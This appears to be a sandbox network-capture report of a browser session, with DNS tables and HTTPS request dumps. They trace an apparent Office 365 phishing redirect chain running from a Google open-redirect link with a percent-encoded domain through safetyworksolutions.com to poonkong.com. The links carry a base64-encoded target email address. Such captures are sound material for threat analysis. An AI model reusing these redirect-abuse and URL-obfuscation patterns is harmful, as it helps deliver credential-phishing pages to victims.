                            Nov 14, 2024 23:39:18.808084965 CET55288443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:18.808085918 CET55288443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:18.808424950 CET55288443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:18.808424950 CET55288443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:18.808445930 CET4435528813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:18.808455944 CET4435528813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:18.811320066 CET55293443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:18.811405897 CET4435529313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:18.811501980 CET55293443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:18.811633110 CET55293443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:18.811666012 CET4435529313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:18.819725990 CET4435528913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:18.820158958 CET55289443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:18.820199966 CET4435528913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:18.820516109 CET55289443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:18.820523977 CET4435528913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:18.953574896 CET4435528913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:18.953735113 CET4435528913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:18.953960896 CET55289443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:18.953960896 CET55289443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:18.953960896 CET55289443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:18.956113100 CET55294443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:18.956150055 CET4435529413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:18.956216097 CET55294443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:18.956386089 CET55294443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:18.956393957 CET4435529413.107.246.45192.168.2.4
                            TimestampSource PortDest PortSource IPDest IP
                            Nov 14, 2024 23:37:54.377986908 CET53524621.1.1.1192.168.2.4
                            Nov 14, 2024 23:37:54.440053940 CET53581531.1.1.1192.168.2.4
                            Nov 14, 2024 23:37:55.600135088 CET6196453192.168.2.41.1.1.1
                            Nov 14, 2024 23:37:55.600503922 CET5845753192.168.2.41.1.1.1
                            Nov 14, 2024 23:37:55.607093096 CET53619641.1.1.1192.168.2.4
                            Nov 14, 2024 23:37:55.607635021 CET53584571.1.1.1192.168.2.4
                            Nov 14, 2024 23:37:55.970935106 CET53566341.1.1.1192.168.2.4
                            Nov 14, 2024 23:37:57.132412910 CET6348053192.168.2.41.1.1.1
                            Nov 14, 2024 23:37:57.133263111 CET5472453192.168.2.41.1.1.1
                            Nov 14, 2024 23:37:57.143161058 CET53634801.1.1.1192.168.2.4
                            Nov 14, 2024 23:37:57.143721104 CET53547241.1.1.1192.168.2.4
                            Nov 14, 2024 23:37:58.590951920 CET5230953192.168.2.41.1.1.1
                            Nov 14, 2024 23:37:58.591094971 CET5759553192.168.2.41.1.1.1
                            Nov 14, 2024 23:37:58.870843887 CET53575951.1.1.1192.168.2.4
                            Nov 14, 2024 23:37:58.870886087 CET53523091.1.1.1192.168.2.4
                            Nov 14, 2024 23:38:02.236180067 CET5844153192.168.2.41.1.1.1
                            Nov 14, 2024 23:38:02.236551046 CET5284453192.168.2.41.1.1.1
                            Nov 14, 2024 23:38:02.243071079 CET53584411.1.1.1192.168.2.4
                            Nov 14, 2024 23:38:02.243777037 CET53528441.1.1.1192.168.2.4
                            Nov 14, 2024 23:38:03.842827082 CET5809953192.168.2.41.1.1.1
                            Nov 14, 2024 23:38:03.844595909 CET4977953192.168.2.41.1.1.1
                            Nov 14, 2024 23:38:03.851671934 CET53497791.1.1.1192.168.2.4
                            Nov 14, 2024 23:38:03.861466885 CET53580991.1.1.1192.168.2.4
                            Nov 14, 2024 23:38:13.321691036 CET53651941.1.1.1192.168.2.4
                            Nov 14, 2024 23:38:14.309410095 CET138138192.168.2.4192.168.2.255
                            Nov 14, 2024 23:38:32.340985060 CET53620641.1.1.1192.168.2.4
                            Nov 14, 2024 23:38:36.016000032 CET5354671162.159.36.2192.168.2.4
                            Nov 14, 2024 23:38:36.645298004 CET53547771.1.1.1192.168.2.4
                            Nov 14, 2024 23:38:54.307985067 CET53641511.1.1.1192.168.2.4
                            Nov 14, 2024 23:38:55.096132040 CET53601061.1.1.1192.168.2.4
                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Nov 14, 2024 23:37:55.600135088 CET192.168.2.41.1.1.10x53a7Standard query (0)www.google.comA (IP address)IN (0x0001)false
                            Nov 14, 2024 23:37:55.600503922 CET192.168.2.41.1.1.10x933bStandard query (0)www.google.com65IN (0x0001)false
                            Nov 14, 2024 23:37:57.132412910 CET192.168.2.41.1.1.10x4272Standard query (0)safetyworksolutions.comA (IP address)IN (0x0001)false
                            Nov 14, 2024 23:37:57.133263111 CET192.168.2.41.1.1.10x4c3cStandard query (0)safetyworksolutions.com65IN (0x0001)false
                            Nov 14, 2024 23:37:58.590951920 CET192.168.2.41.1.1.10x821eStandard query (0)poonkong.comA (IP address)IN (0x0001)false
                            Nov 14, 2024 23:37:58.591094971 CET192.168.2.41.1.1.10x10d8Standard query (0)poonkong.com65IN (0x0001)false
                            Nov 14, 2024 23:38:02.236180067 CET192.168.2.41.1.1.10xc642Standard query (0)cdn.socket.ioA (IP address)IN (0x0001)false
                            Nov 14, 2024 23:38:02.236551046 CET192.168.2.41.1.1.10x2be0Standard query (0)cdn.socket.io65IN (0x0001)false
                            Nov 14, 2024 23:38:03.842827082 CET192.168.2.41.1.1.10x6445Standard query (0)cdn.socket.ioA (IP address)IN (0x0001)false
                            Nov 14, 2024 23:38:03.844595909 CET192.168.2.41.1.1.10x4a09Standard query (0)cdn.socket.io65IN (0x0001)false
                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Nov 14, 2024 23:37:55.607093096 CET1.1.1.1192.168.2.40x53a7No error (0)www.google.com142.250.184.196A (IP address)IN (0x0001)false
                            Nov 14, 2024 23:37:55.607635021 CET1.1.1.1192.168.2.40x933bNo error (0)www.google.com65IN (0x0001)false
                            Nov 14, 2024 23:37:57.143161058 CET1.1.1.1192.168.2.40x4272No error (0)safetyworksolutions.com162.241.87.113A (IP address)IN (0x0001)false
                            Nov 14, 2024 23:37:58.870886087 CET1.1.1.1192.168.2.40x821eNo error (0)poonkong.com162.144.0.229A (IP address)IN (0x0001)false
                            Nov 14, 2024 23:38:02.243777037 CET1.1.1.1192.168.2.40x2be0No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                            Nov 14, 2024 23:38:02.844130993 CET1.1.1.1192.168.2.40xf5c1No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                            Nov 14, 2024 23:38:02.844130993 CET1.1.1.1192.168.2.40xf5c1No error (0)d2vgu95hoyrpkh.cloudfront.net13.226.184.88A (IP address)IN (0x0001)false
                            Nov 14, 2024 23:38:02.844130993 CET1.1.1.1192.168.2.40xf5c1No error (0)d2vgu95hoyrpkh.cloudfront.net13.226.184.17A (IP address)IN (0x0001)false
                            Nov 14, 2024 23:38:02.844130993 CET1.1.1.1192.168.2.40xf5c1No error (0)d2vgu95hoyrpkh.cloudfront.net13.226.184.73A (IP address)IN (0x0001)false
                            Nov 14, 2024 23:38:02.844130993 CET1.1.1.1192.168.2.40xf5c1No error (0)d2vgu95hoyrpkh.cloudfront.net13.226.184.117A (IP address)IN (0x0001)false
                            Nov 14, 2024 23:38:03.851671934 CET1.1.1.1192.168.2.40x4a09No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                            Nov 14, 2024 23:38:03.861466885 CET1.1.1.1192.168.2.40x6445No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                            Nov 14, 2024 23:38:03.861466885 CET1.1.1.1192.168.2.40x6445No error (0)d2vgu95hoyrpkh.cloudfront.net13.35.58.12A (IP address)IN (0x0001)false
                            Nov 14, 2024 23:38:03.861466885 CET1.1.1.1192.168.2.40x6445No error (0)d2vgu95hoyrpkh.cloudfront.net13.35.58.91A (IP address)IN (0x0001)false
                            Nov 14, 2024 23:38:03.861466885 CET1.1.1.1192.168.2.40x6445No error (0)d2vgu95hoyrpkh.cloudfront.net13.35.58.61A (IP address)IN (0x0001)false
                            Nov 14, 2024 23:38:03.861466885 CET1.1.1.1192.168.2.40x6445No error (0)d2vgu95hoyrpkh.cloudfront.net13.35.58.71A (IP address)IN (0x0001)false
                            Nov 14, 2024 23:38:08.917696953 CET1.1.1.1192.168.2.40x48b1No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                            Nov 14, 2024 23:38:08.917696953 CET1.1.1.1192.168.2.40x48b1No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                            Nov 14, 2024 23:38:09.559525967 CET1.1.1.1192.168.2.40x9682No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                            Nov 14, 2024 23:38:09.559525967 CET1.1.1.1192.168.2.40x9682No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                            Nov 14, 2024 23:38:22.984234095 CET1.1.1.1192.168.2.40x2fc2No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                            Nov 14, 2024 23:38:22.984234095 CET1.1.1.1192.168.2.40x2fc2No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                            Nov 14, 2024 23:38:47.457679987 CET1.1.1.1192.168.2.40xf356No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                            Nov 14, 2024 23:38:47.457679987 CET1.1.1.1192.168.2.40xf356No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                            Nov 14, 2024 23:38:50.164838076 CET1.1.1.1192.168.2.40x137bNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                            Nov 14, 2024 23:38:50.164838076 CET1.1.1.1192.168.2.40x137bNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                            Nov 14, 2024 23:39:08.132586002 CET1.1.1.1192.168.2.40x897dNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                            Nov 14, 2024 23:39:08.132586002 CET1.1.1.1192.168.2.40x897dNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                            • www.google.com
                            • https:
                              • safetyworksolutions.com
                              • poonkong.com
                              • cdn.socket.io
                            • fs.microsoft.com
                            • otelrules.azureedge.net
                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.449735142.250.184.1964433236C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:37:56 UTC1063OUTGET /url?sa=https://r20.rs6.net/tnt.jsp?f=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwjU1vfA9siJAxVNh_0HHcggMUkQFnoECB0QAQ&url=amp/s/%73%61%66%65%74%79%77%6F%72%6B%73%6F%6C%75%74%69%6F%6E%73%2E%63%6F%6D%2F%73%78%7A%70%2F7220292368/am9lLm5ndXllbkBsZWcud2EuZ292 HTTP/1.1
                            Host: www.google.com
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            sec-ch-ua-platform: "Windows"
                            Upgrade-Insecure-Requests: 1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                            X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                            Sec-Fetch-Site: none
                            Sec-Fetch-Mode: navigate
                            Sec-Fetch-User: ?1
                            Sec-Fetch-Dest: document
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-11-14 22:37:56 UTC1406INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:37:56 GMT
                            Pragma: no-cache
                            Expires: Fri, 01 Jan 1990 00:00:00 GMT
                            Cache-Control: no-cache, must-revalidate
                            Content-Type: text/html; charset=UTF-8
                            Strict-Transport-Security: max-age=31536000
                            Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-V_VSwAVgqzs3S1pKI1Kebg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                            Accept-CH: Sec-CH-Prefers-Color-Scheme
                            Accept-CH: Sec-CH-UA-Form-Factors
                            Accept-CH: Sec-CH-UA-Platform
                            Accept-CH: Sec-CH-UA-Platform-Version
                            Accept-CH: Sec-CH-UA-Full-Version
                            Accept-CH: Sec-CH-UA-Arch
                            Accept-CH: Sec-CH-UA-Model
                            Accept-CH: Sec-CH-UA-Bitness
                            Accept-CH: Sec-CH-UA-Full-Version-List
                            Accept-CH: Sec-CH-UA-WoW64
                            Permissions-Policy: unload=()
                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                            Server: gws
                            X-XSS-Protection: 0
                            Set-Cookie: NID=519=TPv5y-1QiVdq91EkX40brbv23a6cppQhqxwXvU-NsLLZJa0j4YDgampZo76tl5yztogKyOz6B4-Yy9rXRi5LdyO8FcNfOjL0iA-gRuEZ8vMldhhUJSw_jl5LR6v1TO6qQSdFRQjy9P8r7Da5pYOe9afI43SDTpAG-gEiAZSASIfTYhmYR1qQFEmqJp_h_UYBrWf57g; expires=Fri, 16-May-2025 22:37:56 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                            Accept-Ranges: none
                            Vary: Accept-Encoding
                            Connection: close
                            Transfer-Encoding: chunked
                            2024-11-14 22:37:56 UTC749INData Raw: 32 65 36 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 20 3c 68 65 61 64 3e 20 20 20 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 56 5f 56 53 77 41 56 67 71 7a 73 33 53 31 70 4b 49 31 4b 65 62 67 22 3e 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 20 3d 20 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 76 61 72 20 64 3d 2f 5e 5c 73 2a 28 3f 21 6a 61 76 61 73 63 72 69 70 74 3a 29 28 3f 3a 5b 5c 77 2b 2e 2d 5d 2b 3a 7c 5b 5e 3a 2f 3f 23 5d 2a 28 3f 3a 5b 2f 3f 23 5d 7c 24 29 29 2f 69 3b 0a 28 74 68 69 73 7c 7c 73 65 6c 66 29 2e 67 6f 6f 67 6c 65 2e 6e 61 76 69 67 61 74 65 54 6f 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 63 2c 62 29 7b 21 2f 5c 2f 2e 2a 3f 5b 26 3f 5d 67 73 63 3d 31 2f 2e 74 65 73 74 28 63 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 26 26 61 21
                            Data Ascii: 2e6<html lang="en"> <head> <script nonce="V_VSwAVgqzs3S1pKI1Kebg">window.google = {};(function(){var d=/^\s*(?!javascript:)(?:[\w+.-]+:|[^:/?#]*(?:[/?#]|$))/i;(this||self).google.navigateTo=function(a,c,b){!/\/.*?[&?]gsc=1/.test(c.location.href)&&a!
                            2024-11-14 22:37:56 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1192.168.2.449736142.250.184.1964433236C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:37:56 UTC1703OUTGET /amp/s/safetyworksolutions.com/sxzp/7220292368/am9lLm5ndXllbkBsZWcud2EuZ292 HTTP/1.1
                            Host: www.google.com
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            sec-ch-ua-full-version: "117.0.5938.132"
                            sec-ch-ua-arch: "x86"
                            sec-ch-ua-platform: "Windows"
                            sec-ch-ua-platform-version: "10.0.0"
                            sec-ch-ua-model: ""
                            sec-ch-ua-bitness: "64"
                            sec-ch-ua-wow64: ?0
                            sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                            sec-ch-prefers-color-scheme: light
                            Upgrade-Insecure-Requests: 1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                            X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                            Sec-Fetch-Site: same-origin
                            Sec-Fetch-Mode: navigate
                            Sec-Fetch-Dest: document
                            Referer: https://www.google.com/url?sa=https://r20.rs6.net/tnt.jsp?f=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwjU1vfA9siJAxVNh_0HHcggMUkQFnoECB0QAQ&url=amp/s/%73%61%66%65%74%79%77%6F%72%6B%73%6F%6C%75%74%69%6F%6E%73%2E%63%6F%6D%2F%73%78%7A%70%2F7220292368/am9lLm5ndXllbkBsZWcud2EuZ292
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            Cookie: NID=519=TPv5y-1QiVdq91EkX40brbv23a6cppQhqxwXvU-NsLLZJa0j4YDgampZo76tl5yztogKyOz6B4-Yy9rXRi5LdyO8FcNfOjL0iA-gRuEZ8vMldhhUJSw_jl5LR6v1TO6qQSdFRQjy9P8r7Da5pYOe9afI43SDTpAG-gEiAZSASIfTYhmYR1qQFEmqJp_h_UYBrWf57g
                            2024-11-14 22:37:57 UTC845INHTTP/1.1 302 Found
                            Location: https://safetyworksolutions.com/sxzp/7220292368/am9lLm5ndXllbkBsZWcud2EuZ292
                            Cache-Control: private
                            X-Robots-Tag: noindex
                            Content-Type: text/html; charset=UTF-8
                            Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-Z3ZOh0-59PIyxTTEg7rMkw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                            Permissions-Policy: unload=()
                            Date: Thu, 14 Nov 2024 22:37:56 GMT
                            Server: gws
                            Content-Length: 273
                            X-XSS-Protection: 0
                            X-Frame-Options: SAMEORIGIN
                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                            Connection: close
                            2024-11-14 22:37:57 UTC273INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 73 61 66 65 74 79 77 6f 72 6b 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 73 78 7a 70 2f 37 32 32 30 32 39 32 33 36 38 2f 61 6d 39 6c 4c 6d 35 6e 64 58 6c 6c 62 6b 42 73 5a 57 63 75 64 32 45 75 5a 32 39 32 22 3e 68 65 72 65 3c 2f 41 3e 2e
                            Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://safetyworksolutions.com/sxzp/7220292368/am9lLm5ndXllbkBsZWcud2EuZ292">here</A>.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2192.168.2.449740162.241.87.1134433236C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:37:57 UTC730OUTGET /sxzp/7220292368/am9lLm5ndXllbkBsZWcud2EuZ292 HTTP/1.1
                            Host: safetyworksolutions.com
                            Connection: keep-alive
                            Upgrade-Insecure-Requests: 1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                            Sec-Fetch-Site: cross-site
                            Sec-Fetch-Mode: navigate
                            Sec-Fetch-Dest: document
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            sec-ch-ua-platform: "Windows"
                            Referer: https://www.google.com/
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-11-14 22:37:57 UTC299INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:37:57 GMT
                            Server: Apache
                            refresh: 0;url=https://poonkong.com/o/?c3Y9bzM2NV8xX29uZSZyYW5kPWIxQkJTbWM9JnVpZD1VU0VSMTgxMDIwMjRVMzkxMDE4NDY=N0123Njoe.nguyen@leg.wa.gov
                            Connection: close
                            Transfer-Encoding: chunked
                            Content-Type: text/html; charset=UTF-8
                            2024-11-14 22:37:57 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            3192.168.2.449741162.241.87.1134433236C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:37:59 UTC646OUTGET /favicon.ico HTTP/1.1
                            Host: safetyworksolutions.com
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            sec-ch-ua-platform: "Windows"
                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                            Sec-Fetch-Site: same-origin
                            Sec-Fetch-Mode: no-cors
                            Sec-Fetch-Dest: image
                            Referer: https://safetyworksolutions.com/sxzp/7220292368/am9lLm5ndXllbkBsZWcud2EuZ292
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-11-14 22:37:59 UTC164INHTTP/1.1 404 Not Found
                            Date: Thu, 14 Nov 2024 22:37:59 GMT
                            Server: Apache
                            Content-Length: 315
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                            2024-11-14 22:37:59 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            4192.168.2.449742162.144.0.2294433236C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:37:59 UTC786OUTGET /o/?c3Y9bzM2NV8xX29uZSZyYW5kPWIxQkJTbWM9JnVpZD1VU0VSMTgxMDIwMjRVMzkxMDE4NDY=N0123Njoe.nguyen@leg.wa.gov HTTP/1.1
                            Host: poonkong.com
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            sec-ch-ua-platform: "Windows"
                            Upgrade-Insecure-Requests: 1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                            Sec-Fetch-Site: cross-site
                            Sec-Fetch-Mode: navigate
                            Sec-Fetch-Dest: document
                            Referer: https://safetyworksolutions.com/
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-11-14 22:38:00 UTC208INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:37:59 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Vary: Accept-Encoding
                            Transfer-Encoding: chunked
                            Content-Type: text/html; charset=UTF-8
                            2024-11-14 22:38:00 UTC4726INData Raw: 31 32 36 39 0d 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 6e 6f 73 63 72 69 70 74 3e 59 6f 75 20 6e 65 65 64 20 74 6f 20 65 6e 61 62 6c 65 20 4a 61 76 61 53 63 72 69 70 74 20 74 6f 20 72 75 6e 20 74 68 69 73 20 61 70 70 2e 3c 2f 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 72 6f
                            Data Ascii: 1269<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> </head> <body> <noscript>You need to enable JavaScript to run this app.</noscript> <div id="ro


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            5192.168.2.449743184.28.90.27443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:37:59 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            Accept-Encoding: identity
                            User-Agent: Microsoft BITS/7.8
                            Host: fs.microsoft.com
